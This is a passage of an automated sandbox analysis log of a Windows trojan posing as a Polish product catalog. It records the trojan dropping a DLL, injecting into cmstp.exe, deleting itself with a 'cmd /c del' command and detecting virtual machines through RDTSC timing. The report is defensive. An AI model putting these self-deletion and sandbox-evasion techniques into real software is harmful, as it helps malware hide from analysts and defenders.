          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile created: C:\Users\user\AppData\Local\Temp\nsi487A.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@11/9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: nowy przyk#U0142adowy katalog.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: cmstp.pdbGCTL source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.355596507.000000000E880000.00000004.00000001.sdmp, nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, cmstp.exe, 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nowy przyk#U0142adowy katalog.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10005CC5 push ecx; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00416036 push cs; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041A988 push cs; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00415C85 push 0000003Eh; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00414EBC push ecx; retf
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B7C5 push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A0D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00416036 push cs; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041A988 push cs; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00415C85 push 0000003Eh; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00414EBC push ecx; retf
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B7C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0469D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B812 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B81B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02976036 push cs; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B87C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297A988 push cs; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02974EBC push ecx; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B7C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02975C85 push 0000003Eh; ret
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile created: C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10004E3E RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002968614 second address: 000000000296861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000029689AE second address: 00000000029689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5448Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 776Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10002F80 lstrcpyW,lstrlenW,lstrcpyW,lstrcatW,FindFirstFileW,wsprintfW,_GetThemeDocumentationProperty@16,_GetThemeDocumentationProperty@16,FindNextFileW,FindClose,
          Source: explorer.exe, 00000005.00000000.371834942.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.409164821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.403585689.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.371834942.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.403585689.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.382841011.000000000461E000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.409164821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10008417 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10008417 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10003770 rtrystwqtc,GetProcessHeap,RtlAllocateHeap,VirtualProtect,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10015406 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1001561A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_100156CB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1001570A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10015748 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A72073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A81074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A44257 mov eax, dword ptr fs:[00000030h]
